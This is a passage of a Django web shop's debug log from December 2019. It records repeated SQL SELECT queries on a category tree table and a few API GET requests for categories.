"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:50:03,248 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:50:03,252 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:50:03,256 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:50:03,262 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:50:03,266 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:50:03,270 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:50:03,273 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:50:03,276 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:50:03,283 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:50:03,287 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:50:03,290 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:50:03,293 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:50:03,295 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:50:03,298 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:50:03,302 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:50:03,305 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:50:03,307 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:50:03,310 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:50:03,312 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:50:03,316 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:50:03,319 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:50:03,321 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:50:03,323 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:50:03,326 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:50:03,331 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:50:03,334 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:50:03,336 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:50:03,339 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:50:03,341 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:50:03,343 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:50:03,347 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:50:03,350 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:50:03,353 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:50:03,356 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:50:03,359 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:50:03] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:52:12] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 13:53:45,254 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:53:45,260 utils 4252 140031503103744 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:53:45,264 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:53:45,268 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:53:45,268 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:53:45,271 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:53:45,275 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [19/Dec/2019 13:53:45] "GET /api/v1/categories/12 HTTP/1.0" 200 209 DEBUG 2019-12-19 13:53:45,278 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:53:45,281 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:53:45,283 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:53:45,286 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:53:45,291 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:53:45,294 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:53:45,297 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:53:45,300 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:53:45,303 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:53:45,307 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:53:45,310 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:53:45,313 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:53:45,316 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:53:45,319 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:53:45,323 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:53:45,327 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:53:45,329 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:53:45,331 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:53:45,333 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:53:45,336 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:53:45,339 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:53:45,342 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:53:45,345 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:53:45,348 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:53:45,352 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY 